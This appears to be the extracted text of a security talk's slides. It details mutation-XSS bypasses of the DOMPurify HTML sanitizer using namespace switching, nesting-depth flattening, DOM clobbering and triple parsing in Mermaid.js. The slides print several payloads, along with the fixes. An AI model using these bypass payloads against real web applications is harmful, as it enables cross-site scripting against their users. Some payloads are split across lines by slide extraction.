Playing with HTML parsing to bypass DOMPurify on default configuration

Kévin (Mizu)

Pentester at Bsecure

Bug Hunter

CTF Player @rhackgondins, @FlatNetworkOrg

@kevin_mizu | https://mizu.re

Kévin GERVOT

2/55
 

Client-Side HTML Sanitizer

Kévin GERVOT

A security feature or tool used to clean HTML content by removing or altering potentially dangerous elements, attributes, or scripts, thereby preventing cross-site scripting (XSS) and other code injection attacks.

 

Source: ChatGPT 🤫

3/55
 

DOMPurify

Kévin GERVOT

4/55

parse HTML

sanitize Elements

sanitize Attributes

serialize HTML

sanitize Shadow DOM

Highly simplified version of the DOMPurify logic

HTML string

HTML string

Why are mXSS possible?

Kévin GERVOT

5/55

It is possible that the output of this algorithm, if parsed with an HTML parser, will not return the original tree structure.

[...]

 

Source: HTML Specification - Serializing HTML fragments.

Why are mXSS possible?

Kévin GERVOT

6/55
 

Dom Tree

 <form>

 <div>

 <form>

<form>

<div></form>

<form>

</form>

html

xhtml

xhtml

xhtml

Dom Tree

 <form>

 <div>

xhtml

xhtml

xhtml

What the sanitizer sees

What the DOM sees

Namespaces

Kévin GERVOT

7/55

<style><a>

Dom Tree

 <style><a>

xhtml

html

xhtml

<svg><style><a>

Dom Tree

 <svg>

 <style>

 <a>

svg

svg

html

svg

<math><style><a>

Dom Tree

 <math>

 <style>

 <a>

mathml

mathml

html

mathml

text

node

node

Integration points

Kévin GERVOT

8/55

List of MathML text integration points:

<mi> | <mo> | <mn> | <ms> | <mtext>

List of HTML integration points:

  <annotation-xml>

  <foreignObject>

  <desc>

  <title>

<svg><title><a>

Dom Tree

 <svg>

 <title>

 <a>

html

svg

svg

xhtml

We can switch from SVG to HTML!

DOMPurify 2.0.0 bypass

Kévin GERVOT

9/55

<svg></p><style><a id="</style><img src=x onerror=x>">

DOMPurify 2.0.0

 <svg>

 <p>

html

 <style>

 <a id="</style>XSS">

.innerHTML

 <svg>

svg

 <p>

xhtml

 <style><a id="</style>

 <img src=x onerror=x>"&gt;

(Found by @SecurityMB)

xhtml

xhtml

svg

svg

svg

svg

The <style> tag falls into the HTML namespace, changing its content from a node to text.

DOMPurify 3.1.0 bypass

(IcesFont)

Kévin GERVOT

10/55

Node flattening

Kévin GERVOT

11/55

The algorithm described below places no limit on the depth of the DOM tree generated, or on the length of tag names, attribute names, attribute values, Text nodes, etc.

 

 

Source: HTML Specification - Tree construction.

Node flattening

Kévin GERVOT

12/55

Language Library Nested node limit Handling
C libxml2 255 Removing
Javascript parse5 No limit? -
Python html.parser No limit? -
Java Jsoup No limit? -
Browser DOMParser 512 Flattening

Node flattening

Kévin GERVOT

13/55
 

<div*509><svg><style>

Dom Tree

 <div*509>

 <svg>

 <style>

xhtml

svg

<div*510><svg><style>

Dom Tree

 <div*510>

 <svg>

 <style>

html

xhtml

svg

svg

svg

html

Node flattening

Kévin GERVOT

14/55

<a><a>

Dom Tree

 <a>

xhtml

svg

<div*509><a><svg><a>

Dom Tree

 <div*509>

 <a>

 <svg>

 <a>

html

xhtml

xhtml

svg

 <a>

xhtml

svg

html

HTML Parsing states

Kévin GERVOT

15/55

13.2.4 Parse state ............................................................. 1279
        13.2.4.1 The insertion mode ................................. 1279
        13.2.4.2 The stack of open elements .................. 1280
        13.2.4.3 The list of active formatting elements..... 1282
        13.2.4.4 The element pointers ................................ 1283
        13.2.4.5 Other parsing state flags........................... 1283

 

Source: HTML Specification.

HTML Insertion modes

Kévin GERVOT

16/55

The insertion mode is a state variable that controls the primary operation of the tree construction stage.


Initially, the insertion mode is "initial". It can change to "before html" [...] "after after frameset" during the course of the parsing [...]. The insertion mode affects how tokens are processed [...].

Source: HTML Specification - The insertion mode.

"in caption" insertion mode

Kévin GERVOT

17/55

The user agent must handle the token as follows:
[...]
↳ A start tag whose tag name is one of: "caption" [...]
[...]
    Pop elements from this stack until a caption element has been popped from the stack.

 

Source: HTML Specification - Parsing main incaption.

Stack of open elements

Kévin GERVOT

18/55

The stack grows downwards; the topmost node on the stack is the first one added to the stack, and the bottommost node of the stack is the most recently added node in the stack [...].

 

Source: HTML Specification - The stack of open elements.

<table>

    <caption>

        <div>1</div>

        <div>2</div>

    </caption>

</table>

html

"in caption" insertion mode

Kévin GERVOT

19/55

<table>

    <caption>

        <div>1</div>

        <caption></caption>

        <div>2</div>

    </caption>

</table>

Dom Tree

 <div>2</div>

 <table>

 <div>1</div>

xhtml

xhtml

 <caption>

xhtml

 <caption>

xhtml

xhtml

html

"in caption" insertion mode

Kévin GERVOT

20/55

<table><caption>

<svg>

    <title>

        <caption></caption>

    </title>

    <style><a id="</style><img src onerror=x"></a></style>

</svg>

</caption></table>

Dom Tree

 <table>

xhtml

 <caption>

xhtml

 <svg>

svg

 <title>

svg

 <caption>

xhtml

 <style><a id="</style>

html

 <img src=x onerror=x>&lt;

xhtml

xhtml

It can even traverse namespaces!

"in caption" insertion mode

Kévin GERVOT

21/55

[...]

↳ Anything else

    Process the token using the rules for the "in body" insertion mode.

 

Source: HTML Specification - Parsing main inbody.

"in caption" insertion mode

Kévin GERVOT

22/55

<table><caption><table><caption>

Dom Tree

 <table>

xhtml

svg

svg

<div*508>

<table><caption><table><caption>

Dom Tree

 <div*508>

 <table>

 <caption>

 <table>

html

xhtml

xhtml

xhtml

 <caption>

 <caption>

 <table>

xhtml

 <caption>

xhtml

xhtml

xhtml

xhtml

html

Nested <caption> through node flattening!

DOMPurify 3.1.0 bypass

Kévin GERVOT

23/55

<div*506>
<table><caption>
    <svg>
      <title>
        <
table><caption></caption></table>
      </
title>
      <
style><a id="</style><img src onerror=x>"></a></style>
    </
svg>
</
caption></table>

DOMPurify 3.1.0

 <div*506>

 <table>

xhtml

xhtml

 <caption>

xhtml

 <svg>

 <title>

svg

 <table>

 <caption>

xhtml

 <style>

<a id="[...]">

html

svg

xhtml

svg

svg

DOMPurify 3.1.0 bypass

Kévin GERVOT

24/55

.innerHTML

 <div*506>

 <img src onerror=x>"&gt;

xhtml

xhtml

 <table>

xhtml

 <caption>

xhtml

 <svg>

svg

 <title>

svg

 <table>

xhtml

 <caption>

 <style><a id="</style>

xhtml

xhtml

DOMPurify 3.1.1 bypass

(Me)

Kévin GERVOT

25/55
 

DOMPurify 3.1.1 fix

Kévin GERVOT

26/55

  1. The nested nodes limit is set to 252

currentNode.__depth = currentNode.parentNode.__depth + 1;

/* Remove an element if nested too deeply to avoid mXSS */
if (currentNode.__depth >= MAX_NESTING_DEPTH) {
  _forceRemove(currentNode);
}

Highly simplified version of the DOMPurify 3.1.1 fix

DOMPurify 3.1.1 fix

Kévin GERVOT

27/55
 

  2. DOM Clobbering protection

elm instanceof HTMLFormElement && (
	typeof elm.__depth !== 'undefined' &&
    typeof elm.__depth !== 'number'
)

Highly simplified version of the DOMPurify 3.1.1 fix

DOM Clobbering

Kévin GERVOT

28/55

»

x

»

y.

<div id="x">
    <form id="y">
        <input name="z">
    </form>
 
</div>

z

html

 ←  <div [...]>

 ←  <input [...]>

DOM Clobbering

Kévin GERVOT

29/55

»

f.

 ←  <input name="pare[..]">

»

f.

 ←  undefined

<div>
    <form id="f">
        <input name="parentNode">
    </form>
 
</div>

parentNode

parentNode.

__depth

html

currentNode.__depth = currentNode.parentNode.__depth + 1;

DOMPurify depth bypass

Kévin GERVOT

30/55

<div*200><form><input name="parentNode"><div*200>

DOMPurify 3.1.1

 <div*200>

html

xhtml

<form>

xhtml

<input>

xhtml

 <div*200>

xhtml

Kévin GERVOT

31/55

html

<div*200>
<form>

<input name="parentNode">

<div*200>
<form></form><form>

<input name="parentNode">

<div*105>


DOMPurify 3.1.0 Bypass

DOMPurify 3.1.1 bypass

DOMPurify 3.1.2 bypass

(Me)

Kévin GERVOT

32/55

DOMPurify 3.1.2 fix

Kévin GERVOT

33/55

<svg><title><a>

DOMPurify 3.1.2

 <svg>

html

svg

 <title>

svg

  1. Access .parentNode using the getter.

  2. Block SVG-to-HTML namespace switch.

const HTML_INTEGRATION_POINTS = ['foreignobject', 'annotation-xml'];

Highly simplified version of the DOMPurify 3.1.2 fix

Second order DOM Clobbering

Kévin GERVOT

34/55

»

x.

<form id="x"></form>
<input form="y" name="z">

id=

html

 ←  "y"

»

x.

z

 ←  undefined

»

y.

z

 ←  <input [...] name="z">

"y"

DOMPurify attributes sanitizing

Kévin GERVOT

35/55

<div id="a   "></div>

DOMPurify 3.1.2

 <a id="a">

html

xhtml

  1. Takes the value
  2. Trims it
  3. Sanitizes it
  4. Overwrite it

DOMPurify depth bypass

Kévin GERVOT

36/55

<form id="a "><div*500></div*500></form>

<input form="a" name="__depth">

DOMPurify 3.1.2

 <form id="a">

html

xhtml

 <div*500>

xhtml

 <input name="__depth">

xhtml

For some obscure reason, it doesn't work on Firefox :(

Finding new HTML mutations

Kévin GERVOT

37/55

... FUZZING!

"Elevator" HTML mutation

Kévin GERVOT

38/55

<x><y><z>

    <button>

        <z>

            <button></button>

        </z>

    </button>

    <style></style>

</z></y></x>

DOM Tree

 <x>

 <y>

xhtml

xhtml

 <z>

xhtml

 <button>

xhtml

 <z>

 <button>

 <style>

xhtml

html

xhtml

xhtml

<button> can be <dd>, <dt>, <li> or <table>

"Elevator" HTML mutation

Kévin GERVOT

39/55

<x><y><z>

    <button>

        <x>

            <button></button>

        </x>

    </button>

    <style></style>

</z></y></x>

DOM Tree

 <x>

 <y>

xhtml

xhtml

 <z>

xhtml

 <button>

xhtml

 <x>

 <button>

 <style>

xhtml

html

xhtml

xhtml

<button> can be <dd>, <dt>, <li> or <table>

"Elevator" HTML mutation

Kévin GERVOT

40/55

<svg><y><title><z>

    <button>

        <y><z>

            <button></button>

        </z></y>

    </button>

    <style></style>

</z></title></y></svg>

DOM Tree

 <svg>

 <y>

svg

 <title>

svg

svg

 <style>

html

It can even traverse namespaces!

 [Elevator]

xhtml

svg

svg

 <z>

xhtml

DOMPurify HTML/SVG tags

Kévin GERVOT

41/55

const COMMON_SVG_AND_HTML_ELEMENTS = addToSet({}, [
    'title',
    'style',
    'font',
    'a',
    'script',
]);

Still not working...

Kévin GERVOT

42/55

Can't switch from SVG namespace to HTML namespace...

Still not working...

Kévin GERVOT

43/55

Can't switch from SVG namespace to HTML namespace...

 

... FUZZING!

"Elevator" HTML mutation v2

Kévin GERVOT

44/55

<x><svg>
    <
image><x>
        <
title>
          <
image></image>
        </
title>
    </
x></image>
    <
style></style>
</
svg></x>

DOM Tree

 <x>

 <svg>

xhtml

svg

 <image>

svg

 <x>

svg

 <image>

 <style>

xhtml

html

Browser <image> to <img> conversion works too!

 <title>

svg

svg

"Elevator" HTML mutation v2

Kévin GERVOT

45/55

<div*507>

<svg>
    <
image>
        <title>
            <
svg>

                <image></image>

            </svg>
        </
title>
   
</image>
</svg>

DOM Tree

 <div*507>

 <svg>

xhtml

svg

 <image>

svg

 <title>

svg

 <image>

html

svg

 <svg>

svg

Even if we use HTML integration points, we do not switch to HTML :)

46/55

DOMPurify 3.1.2 bypass

<form id="x ">
<div*504>
<a><svg>
  <
image>
    <
a><title>
      <
svg><image></image></svg>
    </
title></a>
  </
image>
  <
style><a id="</style><img src=x onerror=x>"></a></style>
</
svg></a>
<
input form="x" name="__depth">

DOMPurify 3.1.2

 <form id="x">

 <div*504>

xhtml

xhtml

 <a>

xhtml

 <svg>

xhtml

 <image>

svg

 <a>

svg

 <title>

 <svg>

 <image>

html

 <style>

 <a>

 <input name="_depth">

svg

svg

svg

svg

svg

xhtml

Kévin GERVOT

DOMPurify 3.1.2 bypass

.innerHTML

 <form id="x">

 <div*504>

xhtml

xhtml

 <a>

xhtml

 <svg>

xhtml

 <image>

svg

 <a>

svg

 <title>

 <svg>

 <img>

 <style><a id="</style>

 <img src onerror=x>"&gt;

 <input name="_depth">

svg

svg

xhtml

xhtml

xhtml

xhtml

DOMPurify Triple HTML Parsing bypass
(hash_kitten, ryotkak and I)

Kévin GERVOT

48/55

Mermaid.js

Kévin GERVOT

49/55

function sanitizeMore(txt) {
  return DOMPurify.sanitize(txt);
}

text = DOMPurify.sanitize(sanitizeMore(text, config), config);

Highly simplified version of the Mermaid.js sanitizing process.

Triple HTML parsing bypass

Kévin GERVOT

50/55

${"<form><h1></form><table><form></form></table></form></table></h1></form>".repeat(510)}
<math>
    <
mi>
        <
style><!--</style>
        <
style id="--></style></mi></math><img src=x onerror=x>"></style>
    </
mi>
</
math>

DOMPurify 3.1.2

 <form>

 <h1>

xhtml

 <table>

 <form>

 "mXSS payload"

mathml

 <math>

mathml

html

xhtml

xhtml

xhtml

x510

Depth of 4

Triple HTML parsing bypass

Kévin GERVOT

.innerHTML

 <form>

 <h1>

xhtml

 <table>

 <form>

 <table>

 <h1>

xhtml

xhtml

xhtml

 <math>

 <mi>

New depth = nb of patterns = 510

mathml

 <style><!--</style>

 <style id="-->XSS"></style>

xhtml

xhtml

 [...]

xhtml

mathml

xhtml

xhtml

Triple HTML parsing bypass

Kévin GERVOT

.innerHTML

 <form>

 <h1>

xhtml

 <table>

 <h1>

 <table>

xhtml

xhtml

xhtml

 <math>

 <mi>

mathml

 <style><!--[...]--></style>

 <img src=x onneror=x>"&lt;

xhtml

xhtml

xhtml

 [...]

mathml

mathml

52/55

What's next?

Kévin GERVOT

53/55

DOMPurify 3.1.3 fix

Kévin GERVOT

if (regExpTest(/((--!?|])>)|<\/(style|title)/i, value)) {
	_removeAttribute(name, currentNode);
	continue;
}

Highly simplified version of the DOMPurify 3.1.3 fix

<div id="-->"></div>

DOMPurify 3.1.2

 <div>

html

xhtml

Conclusion

Kévin GERVOT

55/55